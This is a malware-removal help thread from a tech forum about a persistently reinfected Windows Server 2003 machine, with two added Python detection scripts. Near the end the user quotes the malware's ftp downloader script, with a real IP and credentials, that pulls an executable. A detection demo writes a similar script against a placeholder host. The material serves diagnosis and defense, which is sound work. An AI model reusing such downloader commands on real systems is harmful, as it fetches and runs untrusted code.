Virus on win 2003

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by taula, Oct 20, 2011.

  1. taula

    taula Private E-2

    Periodically a threat executing some kind of *123.exe file with temporary files gets caught. It is caught by both NOD32 4... and mam.
    Here I send the log file after running MGtools. Thanks.
     

    Attached Files:

  2. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    I would like to see the logs from running SAS and MBAM. You are missing a log in your MGLogs.zip.

    First:
    Please disable all anti-virus and anti-spyware programs while we do the following (re-enable when you are finished):

    Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:
    After clicking Fix, exit HJT.

    Now copy just the bold text below to notepad (Do not include any space above the word REGEDIT). Save it as fixME.reg to your desktop. Be sure the "Save as" type is set to "all files" Once you have saved it double click it and allow it to merge with the registry.
    Make sure that you tell me if you receive a success message about adding the above
    to the registry. If you do not get a success message, it definitely did not work.


    I am not sure if this will run on your system, but try it:
    Download OTL to your desktop.


    • Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
    • Vista and Windows 7 users Right-click OTL and choose Run as Administrator)
    • When the window appears, underneath Output at the top change it to Minimal Output.
    • Check the boxes beside LOP Check and Purity Check.
    • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan won't take long.
    When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.

    Attach both of these logs into your next reply.

    Now please do this online scan:
    Bitdefender Online Scan
     
    Last edited by a moderator: Oct 20, 2011
  3. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Actually more than one. This is due to the non-English version of Win 2003 answering the version info request with unprintable characters for the English language, which makes the version unrecognized.

    Download and save the below files into the C:\MGtools folder and overwrite the copies already in the folder with these new versions which should work around the problem.

    GetRunKey

    ShowNew

    NwkTst


    Now run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista or Win7, don't double click, use right click and select Run As Administrator).



    Then attach the below logs:
    • C:\MGlogs.zip
    @TimW, I modified your fix since debugging MGtools will not be necessary with the above. ;)

    Also you missed the AppInit_DLL >>
    Code:
      
    HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows
       AppInit_DLLs REG_SZ          scawqu.dll
     
    Last edited: Oct 20, 2011
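    The AppInit_DLLs value chaslang points out above is a classic persistence location: every DLL listed there is loaded into each process that links user32.dll, so a non-empty value naming an unfamiliar DLL is worth a look on its own. The script below is an added example written for this thread, not code from the thread or from MGtools; it parses the text output of `reg query` (the same "name type data" shape as the GetRunKey line quoted above) for that key and reports anything worth investigating. The listing it reads is constructed; the only value taken from the thread is the DLL name scawqu.dll.

```python
"""Flag AppInit_DLLs persistence from a saved 'reg query' listing (added example)."""
import re

# Key whose AppInit_DLLs value Windows loads into every user32.dll-linked process
APPINIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"

# reg query prints "    Name    REG_TYPE    data"; this also matches the
# GetRunKey-style line quoted in the thread ("AppInit_DLLs REG_SZ scawqu.dll").
VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s*(.*?)\s*$")


def parse_reg_listing(text):
    """Return {value_name: (type, data)} for every value line in the listing."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def check_appinit(text):
    """Return a list of human-readable findings; an empty list means nothing to report."""
    values = parse_reg_listing(text)
    findings = []
    _, data = values.get("AppInit_DLLs", ("REG_SZ", ""))
    dlls = [d for d in re.split(r"[,\s]+", data) if d]
    if dlls:
        findings.append("AppInit_DLLs is non-empty: " + ", ".join(dlls))
        for d in dlls:
            # A bare file name (no path) is resolved through the DLL search order,
            # which is how a dropper placed in system32 gets itself loaded.
            if "\\" not in d:
                findings.append("  %s has no directory: look for it in %%SystemRoot%%\\system32" % d)
    # LoadAppInit_DLLs exists on Vista and later; on Server 2003 it is simply absent.
    typ, data = values.get("LoadAppInit_DLLs", (None, None))
    if typ == "REG_DWORD" and data and int(data, 16) != 0:
        findings.append("LoadAppInit_DLLs is enabled (%s)" % data)
    return findings


# Constructed sample mimicking 'reg query' on the infected host (scawqu.dll is from the thread)
SAMPLE_LISTING = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows
    AppInit_DLLs    REG_SZ    scawqu.dll
    DeviceNotSelectedTimeout    REG_SZ    15
    LoadAppInit_DLLs    REG_DWORD    0x1
"""

# Constructed clean baseline: AppInit_DLLs present but empty
CLEAN_LISTING = """
    AppInit_DLLs    REG_SZ
    DeviceNotSelectedTimeout    REG_SZ    15
"""

if __name__ == "__main__":
    for finding in check_appinit(SAMPLE_LISTING):
        print(finding)
```

    On a live machine, feed it the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"` saved to a file; the clean baseline shows that an empty value produces no findings.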
  4. taula

    taula Private E-2

    here it goes
     

    Attached Files:

  5. taula

    taula Private E-2

    Sorry, here it goes after disabling MBAM and NOD32 v4. Beg your pardon!!
     

    Attached Files:

  6. taula

    taula Private E-2

    More: here I send MBAM when it detects the threat, and the Bitdefender scan and OTL scan.
     
  7. taula

    taula Private E-2

    Reports of: OTL, Bitdefender and MBAM when it detects the threat
     
  8. taula

    taula Private E-2

    Sorry, file not added :(:(
     

    Attached Files:

  9. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Please re-run my last fix. Nothing was removed from your HJT log. If necessary, go into your IE settings and remove everything in your trusted zone!!

    Also, use add/remove programs to uninstall this:
    Messenger Plus! Live

    Now:
    Double-click OTL.exe to start the program.

    • Copy and Paste the following code into the Custom Scans/Fixes textbox. Do not include the word Code

    Code:
    :processes
    :otl
    :files
    @Alternate Data Stream - 122 bytes -> C:\Documents and Settings\All Users\Datos de programa\TEMP:BC359956
    C:\WINDOWS\system32\89d396a.dll
    C:\WINDOWS\system32\89d3a44.dll
    C:\WINDOWS\system32\ge.dat
    C:\WINDOWS\system32\on692.exe
    C:\WINDOWS\system32\onf123.dat
    C:\WINDOWS\system32\onf360.dat
    C:\WINDOWS\system32\onf5.dat
    C:\WINDOWS\system32\onf692.dat
    C:\WINDOWS\system32\onfserver.dat
    C:\WINDOWS\system32\onfzjz.dat
    C:\WINDOWS\system32\s692.exe
    C:\WINDOWS\system32\sa.exe
    C:\WINDOWS\system32\sh123.exe
    C:\WINDOWS\system32\shzjz.exe
    
    :commands
    [PURITY]
    [EMPTYTEMP]
    [RESETHOSTS]
    [REBOOT]
    
    
    • Then click the Run Fix button at the top.
    • Click the OK button.
    • OTL may ask to reboot the machine. Please do so if asked.
    • The report should appear in Notepad after the reboot. Just close notepad and attach this log from OTL to your next message.


    Now clean out this folder:
    C:\WINDOWS\Temp\

    Now run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista or Win7, don't double click, use right click and select Run As Administrator).


    Then attach the below logs:

    • C:\MGlogs.zip

    Make sure you tell me how things are working now!
     
  10. taula

    taula Private E-2

    Here it goes. Thanks.
     

    Attached Files:

  11. taula

    taula Private E-2

    That malware has mutated to sh1.exe, onsyn.exe, sh2016.exe, and shsyn.exe and opens a connection to IP 202.102.113.202 (China) using the IRC protocol.
     

    Attached Files:

  12. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Please re-run OTL and attach a new log.
     
  13. taula

    taula Private E-2

    OK, here we go. Still deleting one by one (in IE) each O15 entry! Sorry, the trusted zone is so full and I cannot delete all of them using the tool.

    To improve this I'll send the two last reports from MBAM, detecting svehost.exe and other pests. Thanks.
     

    Attached Files:

  14. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Please download SystemLook from one of the links below and save it to your Desktop.
    Download Mirror #1
    Download Mirror #2


    • Double-click SystemLook.exe to run it.
    • Copy the content of the following codebox into the main textfield:
      Code:
      :filefind
      svehost
      
    • Click the Look button to start the scan.
    • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
    Note: The log can also be found on your Desktop entitled SystemLook.txt
     
  15. taula

    taula Private E-2

    OK, done. I have also added a partial log file recorded by NOD32 v4, and a copy of the pair of exe-dat files supposedly created by the virus... The curious thing is: sqlservr.exe creates the files hexserver.exe and hex2016.exe. Are they legal? sqlservr is the SQL Server 2008 R2 Express main. And secondly, on2016.exe seems to be created by ftp.exe (it is legal.. attending to the date of creation). ftp is running on this server to upload files via FTP for a web server.
    So are MBAM and NOD32 detecting false positives in this case?? Is there someone in China trying to upload or download files from the server?
    Thanks for your patience
     

    Attached Files:

  16. taula

    taula Private E-2

    To clarify more, I'll also send the MBAM detection when NOD32 also does. The only thing I cannot explain is why the firewall turns off when the threats begin to be detected :(
     

    Attached Files:

  17. taula

    taula Private E-2

    Finally got a zipped file with all the threats. I hope you can manage them!!
     

    Attached Files:

  18. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Yes, those are legit files, but if you are curious about them, you can upload them to Jotti:

    Click on the following link and use the below steps to scan a file: Virustotal

    Click the Browse... button.
    Navigate to the file and add it.
     
  19. taula

    taula Private E-2

    Even more: using Process Explorer I captured this. It is provoked by a cmd command. In the txt file goes the exact command, and it seems to be originated by sqlservr.exe, which should be a legal file :rolleyes:
     

    Attached Files:

  20. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    * Double-click SystemLook.exe to run it.
    * Copy the content of the following codebox into the main textfield:
    Code:
    
    :filefind
    sh2016sv.exe
    
    * Click the Look button to start the scan.
    * When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.

    Note: The log can also be found on your Desktop entitled SystemLook.txt
     
  21. taula

    taula Private E-2

    I have found that those threats disappear once they are detected by MBAM or NOD32. But curiously I got these two threats.. onserver2000.exe and sserever.exe. Both are gone once detected by MBAM and NOD32, and when they begin to run they turn off the Windows Firewall.
     

    Attached Files:

  22. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    I am not familiar enough with SQL server to help you with these. They appear to be legit files, but you may want to post in the software forum for additional assistance.
     
  23. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    @ TimW.
    No! This is an infection. The onserver.exe can be seen to be infected just by scanning with VirusTotal. Also you can see from the .dat files in the ZIP file that they are trying to contact IP addresses in China. See the below link for scan info related to the onserver.exe file:

    http://www.virustotal.com/file-scan/report.html?id=f64dd2ac9a07fbf835eaef02cd841b6cc747adea0b1d4b88931b1efc54720f61-1320886778


    @taula,

    Please download the current version of MGtools and save it to your root folder. Overwrite your previous MGtools.exe file with this one.

    Run MGtools.exe ( Note: If using Vista or Win7, make sure UAC is still disabled. Also don't double click on it, use right click and select Run As Administrator )

    Now attach the below log:
    • C:\MGlogs.zip
     
    Last edited: Nov 9, 2011
  24. taula

    taula Private E-2

    Here we go: I have several unsupported advices.. maybe caused by the Spanish version?
     

    Attached Files:

  25. taula

    taula Private E-2

    To add more fire I would like to post what I get using GMER. I can see three suspicious services without a name, or with a name between {fa....} with numbers and letters (sounds like versions), and nothing about whether they are on, off or paused. I hope this helps.
     

    Attached Files:

  26. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    I see that you have an illegal copy of NOD32 installed. You have to uninstall this now before we will continue to support you. See the below link:

    Warning about Porn, Keygens, Cracks, and other Illegal Software

    After you have uninstalled the below:

    Eset-NOD32: Fix Dasumo v4
    ESET NOD32 Antivirus



    then remove all of those URLs that you have put into your Trusted Zone as TimW requested earlier. You should not be adding things like this to your Trusted Zone. It is almost never necessary and it is a bad practice to do this for no reason. In addition, adding so many makes it easy for malware to hide there.

    Once you have done the above, let's again download an even newer MGtools and get a new log so that we can continue.

    Please download the current version of MGtools and save it to your root folder. Overwrite your previous MGtools.exe file with this one.

    Run MGtools.exe ( Note: If using Vista or Win7, make sure UAC is still disabled. Also don't double click on it, use right click and select Run As Administrator )


    Now attach the below log:
    • C:\MGlogs.zip
     
  27. taula

    taula Private E-2

    All is done, finally, and here comes the MGtools log.
     

    Attached Files:

  28. thisisu

    thisisu Malware Consultant

    Hi, I will try to help you while chaslang is away.

    From Add/Remove Programs (via Control Panel), please uninstall the below:
    • J2SE Runtime Environment 5.0 Update 15
    • Java(TM) 6 Update 7

    Now we need to make use of OTL by Old Timer.
    • Double-click OTL.exe to run (Vista and Win7 right-click and select Run as administrator)
    • When OTL opens, copy the text in the code box below and paste it into the Custom Scans/Fixes text-field.
      Code:
      :otl
      O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
      O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No CLSID value found.
      O4 - HKLM..\RunOnceEx: [Flags] Reg Error: Invalid data type. File not found
      O4 - HKLM..\RunOnceEx: [Title] UnHackMe Rootkit Check File not found
      [2011/10/17 23:31:41 | 000,000,002 | RHS- | M] () -- C:\WINDOWS\winstart.bat
      [2011/09/19 13:13:39 | 000,709,968 | ---- | C] () -- C:\WINDOWS\is-EO24O.exe
      [2011/05/04 19:19:01 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll84004.dll
      [2011/05/04 19:18:53 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll57487.dll
      [2011/03/31 14:03:23 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll53990.dll
      [2011/02/21 23:04:54 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll78727.dll
      [2011/02/21 23:04:49 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll64189.dll
      [2011/02/21 23:04:46 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll10090.dll
      [2011/02/21 09:35:16 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll62595.dll
      [2011/02/20 22:21:51 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll63809.dll
      [2011/09/12 00:23:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Datos de programa\ESET
      [2010/05/11 07:33:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrador\Datos de programa\Uniblue
      :services
      BQMRWOX
      :files
      C:\327882R2FWJFW
      C:\32788R22FWJFW
      C:\WINDOWS\system32\sh3.exe
      C:\WINDOWS\system32\shsyn.exe
      sc config BQMRWOX start= disabled /c
      :commands
      [purity]
      [emptytemp]
      
    • Now click the Run Fix button.
    • OTL may ask to reboot the machine. Please do so if asked.
    • Click the OK button.
    • When complete, Notepad will open.
    • Close Notepad.
    • A log file will be located at C:\_OTL\MovedFiles\mmddyyyy_hhmmss.log, where mmddyyyy_hhmmss is the date of the tool run.
    • Attach this log to your next message. (How to attach items to your post)
    • Now open OTL again and click the Run Scan button
      Note: This automatically updates the OTL.txt log on your desktop.
    • Attach OTL.txt to your next message. (How to attach items to your post)

    Now run C:\MGtools\GetLogs.bat by double-clicking it (Vista and Win7 right-click and select Run as Administrator)
    Then attach C:\MGlogs.zip to your next message. (How to attach items to your post)
    Note: This will automatically update all the logs inside MGlogs.zip

    LET ME KNOW HOW THE PC IS RUNNING AFTER YOU HAVE COMPLETED THESE STEPS
     
  29. taula

    taula Private E-2

    Thanks.. Here the files go. I have added an OTL log with LOP and Purity just in case...
     

    Attached Files:

  30. thisisu

    thisisu Malware Consultant

    Please re-read my instructions carefully.
     
  31. taula

    taula Private E-2

    The PC runs smoothly now. No more spurious threats.
    Thx
     
  32. thisisu

    thisisu Malware Consultant

    I was wanting to double-check this log for you but you never attached it.

    Glad to hear it. Surf safely!

    If you are not having any other malware problems, it is time to do our final steps:
    1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no protection. They do not use any significant amount of resources ( except a little disk space ) until you run a scan.
    2. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
      • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
      • "%userprofile%\Desktop\combofix" /uninstall
        • Notes: The space between the combofix" and the /uninstall, it must be there.
        • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.
    3. Go back to step 6 of the READ ME and re-enable your Disk Emulation software with Defogger if you had disabled it.
    4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
    5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
    6. If running Vista, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
    7. Go to add/remove programs and uninstall HijackThis if it is present.
    8. Go to the C:\MGtools folder and find the MGclean.bat file. Double click on this file to run this cleanup program that will remove files and folders related to MGtools and some other items from our cleaning procedures.
    9. If you are running Win 7, Vista, Windows XP or Windows ME, do the below:
      • Refer to the cleaning procedures pointed to by step 7 of the READ ME
        for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
      • Then reboot and Enable System Restore to create a new clean Restore Point.
    10. After doing the above, you should work through the below link:
     
  33. taula

    taula Private E-2

    It appeared again this morning. I add the MBAM log info and the one you asked me for; it was done but never attached. Beg your pardon.
     

    Attached Files:

  34. thisisu

    thisisu Malware Consultant

    Run an OTL scan using these settings...
    • Double-click OTL.exe to run (Vista and Win7 right click and select Run as administrator)
    • When the window appears, underneath Output at the top-right, make sure Standard Output is selected.
    • Select Scan All Users.
    • Under Drivers and Services, choose "All" for both.
    • Check the boxes beside LOP Check and Purity Check.
    • Copy the text in the code box below and paste it into the Custom Scans/Fixes text-field.
      Code:
      netsvcs
      /md5start
      atapi.sys
      csrss.exe
      explorer.exe
      regedit.exe
      services.exe
      svchost.exe
      userinit.exe
      winlogon.exe
      /md5stop
      %systemdrive%\*.*
      %systemroot%\*. /mp /s
      %systemroot%\system32\*.sys /90
      %systemroot%\system32\*.exe /lockedfiles
      %systemroot%\system32\drivers\*.sys /lockedfiles
      
    • Now click the Run Scan button.
    • When the scan is complete, Notepad will open with the results of the OTL scan.
    • Close Notepad.
    • There will be a log file on your desktop entitled OTL.txt.
    • Attach OTL.txt to your next message. (How to attach items to your post)
     
  35. taula

    taula Private E-2

    ok, done
     

    Attached Files:

    • OTL.Txt (229.4 KB)
  36. thisisu

    thisisu Malware Consultant

    Now we need to make use of OTL by Old Timer.
    • Double-click OTL.exe to run (Vista and Win7 right-click and select Run as administrator)
    • When OTL opens, copy the text in the code box below and paste it into the Custom Scans/Fixes text-field.
      Code:
      :otl
      [2011/11/13 23:24:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Datos de programa\Driver Mender
      [2011/11/18 08:33:53 | 000,000,110 | ---- | M] () -- C:\WINDOWS\System32\shxiangming.exe
      [2011/11/18 08:33:44 | 000,000,072 | ---- | M] () -- C:\WINDOWS\System32\onfxiangming.dat
      [2011/11/16 23:01:27 | 000,000,061 | ---- | M] () -- C:\WINDOWS\System32\sh2020.exe
      [2011/11/16 23:01:14 | 000,000,062 | ---- | M] () -- C:\WINDOWS\System32\onf2020.dat
      [2011/11/16 23:00:51 | 000,000,061 | ---- | M] () -- C:\WINDOWS\System32\sh2016.exe
      [2011/11/16 23:00:30 | 000,000,062 | ---- | M] () -- C:\WINDOWS\System32\onf2016.dat
      [2011/11/16 15:45:17 | 000,000,056 | ---- | M] () -- C:\WINDOWS\System32\onfsyn.dat
      [2011/11/15 17:32:58 | 000,000,074 | ---- | M] () -- C:\WINDOWS\System32\onfserver2000.dat
      [2011/11/14 18:06:41 | 000,000,060 | ---- | M] () -- C:\WINDOWS\System32\onf3.dat
      :commands
      [emptytemp]
      [resethosts]
      
    • Now click the Run Fix button.
    • OTL may ask to reboot the machine. Please do so if asked.
    • Click the OK button.
    • When complete, Notepad will open.
    • Close Notepad.
    • A log file will be located at C:\_OTL\MovedFiles\mmddyyyy_hhmmss.log, where mmddyyyy_hhmmss is the date of the tool run.
    • Attach this log to your next message. (How to attach items to your post)
    • Now open OTL again and click the Run Scan button
      Note: This automatically updates the OTL.txt log on your desktop.
    • Attach OTL.txt to your next message. (How to attach items to your post)

    How are things running now?
     
  37. taula

    taula Private E-2

    OK. Both logs are done + I have discovered several very suspicious registry entries; I'll send you an export of them. I have an empty key in the registry corresponding to hkey_local_machine\Software\microsoft\windows\securitycenter\svc. Doesn't that mean no notification for discovered viruses?
     

    Attached Files:

  38. thisisu

    thisisu Malware Consultant

    Can you see if these work on Server 2003?

    If one doesn't work, just continue on with the next tool.

    Now we need to run TDSSKiller by Kaspersky
    Follow the instructions here and attach your log when you are finished. (How to attach items to your post)


    Please download MBRCheck by GeeksToGo to your desktop.
    See the download links under the MBRCheck icon
    • Double click MBRCheck.exe to run (Vista and Win7 right click and select Run as Administrator)
    • It will show a Black screen with some information that will contain either the below line if no problem is found:
      • Done! Press ENTER to exit...
    • Or you will see more information like below if a problem is found:
      • Found non-standard or infected MBR.
      • Enter 'Y' and hit ENTER for more options, or 'N' to exit:
    • Either way, just choose to exit the program at this point since we want to see only the scan results to begin with.
    • MBRCheck will create a log named similar to MBRCheck_07.16.10_00.32.33.txt which is random based on date and time.
    • Attach this log to your next message. (How to attach items to your post)

    Now we need to run GMER.
    Follow the instructions here and attach your log when you are finished. (How to attach items to your post)
     
  39. taula

    taula Private E-2

    Well, while Kaspersky and MBRCheck ran smoothly, in the middle of GMER I got the infamous blue screen.. I'll try to do it again. IE turned very unresponsive and slow.
     

    Attached Files:

  40. taula

    taula Private E-2

    OK. After going back and forth I got it: it is a kind of Sasser virus. It has a .dat file with the following ftp code:
    open 121.33.253.111
    ming
    xin
    get (whatever).exe
    bye

    xin and min are the user and password for that ftp server. It is executed by its counterpart .exe, which turns off the firewall and executes the ftp script.
    The main threat is onxiangming.exe (352kb)

    How can I get rid of that ****ing SASSER type virus?

    I have been so crazy and disabled all antivirus and anti-malware, and the first thing that happened was an lsass.exe error and a close of LSA.
    It uses sh2016.exe, sh2020.exe to get their counterpart .exe files from the IP
    125.64.23.180
     
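    The .dat file taula describes above is a command script for the built-in ftp.exe (run as `ftp -s:file`): the first line opens the host, the next two bare lines are consumed as username and password, and `get` pulls the executable down. That shape is easy to search for, which is what the Python below does. It is an added example written for this thread, not code from the thread or from any of the tools used in it: it walks a directory for small files that parse as such a script and pairs each with an executable next to it, using the onfNNN.dat / shNNN.exe naming seen in the OTL logs above. The directory tree it scans, the host 192.0.2.10 and the credentials in the sample are all constructed placeholders.

```python
"""Find ftp.exe command scripts dropped as .dat files and their .exe partners (added example)."""
import os
import re
import tempfile

OPEN_RE = re.compile(r"^open\s+(\S+)", re.IGNORECASE)
GET_RE = re.compile(r"^(?:get|mget)\s+(\S+)", re.IGNORECASE)
EXECUTABLE_RE = re.compile(r"\.(exe|dll|bat|cmd|scr)$", re.IGNORECASE)
# ftp.exe commands a script may contain besides open/get; any other bare line
# is consumed by ftp.exe as the username and then the password.
FTP_VERBS = {"bye", "quit", "binary", "bin", "ascii", "prompt", "lcd", "cd",
             "close", "get", "mget", "put", "mput", "open", "user", "hash"}


def parse_ftp_script(text):
    """Return host, credentials and fetched files if text is an ftp.exe script
    that downloads an executable; otherwise None."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if not lines:
        return None
    m = OPEN_RE.match(lines[0])
    if not m:
        return None
    gets = [g.group(1) for g in map(GET_RE.match, lines[1:]) if g]
    if not any(EXECUTABLE_RE.search(g) for g in gets):
        return None  # fetches nothing runnable: not the dropper pattern
    bare = [l for l in lines[1:] if l.split()[0].lower() not in FTP_VERBS]
    return {
        "host": m.group(1),
        "user": bare[0] if len(bare) > 0 else "",
        "password": bare[1] if len(bare) > 1 else "",
        "gets": gets,
    }


def scan_for_droppers(root, max_size=4096):
    """Walk root for small files that parse as downloader scripts and pair each
    with an executable in the same directory (same stem, or onfNNN.dat -> shNNN.exe)."""
    findings = []
    for dirpath, _, names in os.walk(root):
        present = {n.lower() for n in names}
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue  # the scripts on the thread are well under 1 KB
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    parsed = parse_ftp_script(fh.read())
            except OSError:
                continue
            if parsed is None:
                continue
            stem = os.path.splitext(name)[0].lower()
            candidates = [stem + ".exe"]
            if stem.startswith("onf"):
                candidates.append("sh" + stem[3:] + ".exe")
            partner = next((c for c in candidates if c in present), None)
            findings.append(dict(parsed, script=path, partner_exe=partner))
    return findings


def demo():
    """Build a constructed sample tree (placeholder host/credentials) and scan it."""
    base = tempfile.mkdtemp(prefix="ftpdrop_")
    sys32 = os.path.join(base, "system32")
    os.makedirs(sys32)
    with open(os.path.join(sys32, "onf2016.dat"), "w") as fh:
        fh.write("open 192.0.2.10\nuser1\npass1\nget payload.exe\nbye\n")
    with open(os.path.join(sys32, "sh2016.exe"), "wb") as fh:
        fh.write(b"MZ placeholder")  # stands in for the partner executable
    with open(os.path.join(sys32, "benign.dat"), "w") as fh:
        fh.write("name=value\n")
    return scan_for_droppers(base)


if __name__ == "__main__":
    for f in demo():
        print("%s -> %s (partner: %s, fetches %s)" % (f["script"], f["host"], f["partner_exe"], f["gets"]))
```

    Run it against `%SystemRoot%\system32` (with a larger `max_size` if needed) to list every script of this kind together with the executable that would launch it; a hit whose partner is missing still identifies the host the dropper pulls from.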
  41. thisisu

    thisisu Malware Consultant

    Is there any chance that you can leave this server offline while you do the below? Are any other machines there infected as well?

    Download Virus Removal Tool from Here to your desktop

    Run the program you have just downloaded to your desktop (it will be randomly named )

    First we will run a virus scan

    • Click the cog in the upper right


    • Select down to and including your main drive, once done select the Automatic scan tab and press Start Scan


    • Allow Virus Removal Tool to delete all infections found
    • Once it has finished select report tab (last tab)
    • Select Detected threats report from the left and press Save button
    • Save it to your desktop and attach to your next post. (How to attach items to your post)
     
  42. taula

    taula Private E-2

    After 3 days of scanning I finally got a log file.. and it seems to work like a charm. Thanks.
     

    Attached Files:

  43. thisisu

    thisisu Malware Consultant

    Ok that removed quite a bit. Is the server online or offline? I would leave it offline until you are sure the infection has not returned. I am suspecting that another machine in the area is reinfecting the server.
     
  44. taula

    taula Private E-2

    It happened again. Another attack, but the server is alone; no other machine is on the net. It is basically a web server. And yes, it only happens when it is open to the internet; it never happens when the network is closed.
     
  45. taula

    taula Private E-2

    I am going to close the web server to see the effect... This machine has a fixed IP on the internet.
     
  46. taula

    taula Private E-2

    OK, I have been checking all the files inside the main dir of the web server and.. OH SURPRISE, I got a .BAT file which is not mine at all. I renamed the extension to txt and I would like you to examine it, please. I didn't create that bat file.. but more, how can it be created inside the main dir of the web server if I only put .aspx forms there?
     

    Attached Files:

  47. thisisu

    thisisu Malware Consultant

    getrunkey.bat is part of MGtools.

    Can you run C:\MGtools\GetLogs.bat and attach the latest MGlogs.zip for review?
     
  48. taula

    taula Private E-2

    I'll do it. Should it be with the net connection off???
     
  49. thisisu

    thisisu Malware Consultant

    Preferably, yes. You're absolutely sure no other machines are connected to this server?
     
  50. taula

    taula Private E-2

    There is a Brother 410 printer only. This is behind a router. When I close the network connection, no infection is activated.
     
